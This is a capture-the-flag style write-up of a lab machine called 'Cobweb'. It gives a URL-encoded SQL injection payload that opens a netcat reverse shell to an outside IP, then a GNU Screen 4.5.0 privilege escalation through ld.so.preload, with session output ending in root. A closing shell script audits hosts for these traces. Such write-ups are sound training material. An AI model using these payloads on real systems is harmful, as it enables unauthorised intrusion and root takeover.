Cobweb - Intermediate

Posted by WSssSW on 2024-11-07

Source code disclosure
The source code can be read directly, and it contains a SQL injection.

Reverse shell payload
http://192.168.167.162/phpinfo%22%20%20union%20select%20'system(%22nc%20-e%20/bin/bash%20192.168.45.250%2080%22);echo%2011122;'%20order%20by%201%20desc%20%20--%20

Check for SUID binaries
The screen binary is vulnerable: GNU Screen 4.5.0 - Local Privilege Escalation

sh-4.4# find / -perm -u=s -type f 2>/dev/null
/var/tmp/rootshell
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/fusermount3
/usr/bin/screen-4.5.0
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/userhelper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/cockpit-session
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/proxy_child
/usr/libexec/sssd/selinux_child

Following the method in https://www.exploit-db.com/exploits/41154, build libhax.so and rootshell locally. When compiling rootshell, add -static, otherwise it will not run. The working directory also has to be changed to /var/tmp, since the SUID binary would not execute from the exploit's default location.
Privilege escalation succeeded
bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so  rootshell
bash-4.4$ cd /etc
bash-4.4$ unmask 000
bash: unmask: command not found
bash-4.4$ umask 000 # because
bash-4.4$ screen -D -m -L ld.so.preload echo -ne  "\x0a/var/tmp/libhax.so"
bash-4.4$ screen -ls 
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-apache.

bash-4.4$ cd /var/tmp
bash-4.4$ ls
libhax.so  rootshell
bash-4.4$ ls -al
total 788
drwxrwxrwt   2 root   root       40 Nov  7 07:16 .
drwxr-xr-x. 22 root   root     4096 Aug 27  2021 ..
-rwxrwxrwx   1 apache apache  15696 Nov  7 06:57 libhax.so
-rwsr-xr-x   1 root   root   785800 Nov  7 07:13 rootshell
bash-4.4$ ./rootshell 
sh-4.4# whoami
root
sh-4.4# cd /root
sh-4.4# ls
proof.txt
sh-4.4# cat proof.txt 
392388689a0ceba499668648185647f6
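As an added defender-side check (my example, not part of the original writeup): a shell audit that flags the two traces this escalation leaves on the host, an /etc/ld.so.preload entry pointing outside the system library directories and a setuid binary in a world-writable directory such as /var/tmp. The function names and the sample preload file used in testing are my own constructions.

```shell
#!/usr/bin/env bash
# Audit for the two traces the escalation above leaves on a host: an attacker-controlled
# entry in /etc/ld.so.preload and a stray setuid binary in a world-writable directory.

# Print every questionable entry of a preload file; return 1 if any was found.
audit_preload() {
  local file="${1:-/etc/ld.so.preload}" bad=0 lib owner perms
  [ -e "$file" ] || { echo "OK: no preload file at $file"; return 0; }
  # ld.so accepts whitespace or ':' as separators, so normalise ':' to newlines
  # and let word splitting do the rest.
  for lib in $(tr ':' '\n' < "$file"); do
    case "$lib" in
      /lib/*|/lib64/*|/usr/lib/*|/usr/lib64/*) ;;   # where legitimate preloads live
      *) echo "SUSPICIOUS: preload entry outside system library dirs: $lib"
         bad=1; continue ;;
    esac
    if [ ! -e "$lib" ]; then
      # Corresponds to the "cannot be preloaded ... ignored" line in the session above.
      echo "SUSPICIOUS: dangling preload entry: $lib"
      bad=1; continue
    fi
    owner=$(stat -c '%U' "$lib"); perms=$(stat -c '%A' "$lib")
    # A preloaded library must be root-owned and not writable by group or others
    # (positions 6 and 9 of the symbolic mode string must be '-').
    case "$owner $perms" in
      "root "?????-??-*) ;;
      *) echo "SUSPICIOUS: $lib owned by $owner with mode $perms"; bad=1 ;;
    esac
  done
  return "$bad"
}

# List setuid files outside the directories that normally hold them; the rootshell
# planted in /var/tmp in the session above would appear here.
find_stray_suid() {
  find "${1:-/}" -xdev -type f -perm -4000 \
    ! -path '/usr/*' ! -path '/bin/*' ! -path '/sbin/*' \
    ! -path '/lib/*' ! -path '/lib64/*' 2>/dev/null
}

# Run both checks against the live system when invoked with --live (e.g. from cron).
if [ "${1:-}" = "--live" ]; then
  audit_preload /etc/ld.so.preload
  find_stray_suid /
fi
```

Any non-empty output from either function on a production host is worth an incident ticket, since neither a preload entry under /var/tmp nor a setuid file there has a legitimate reason to exist.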
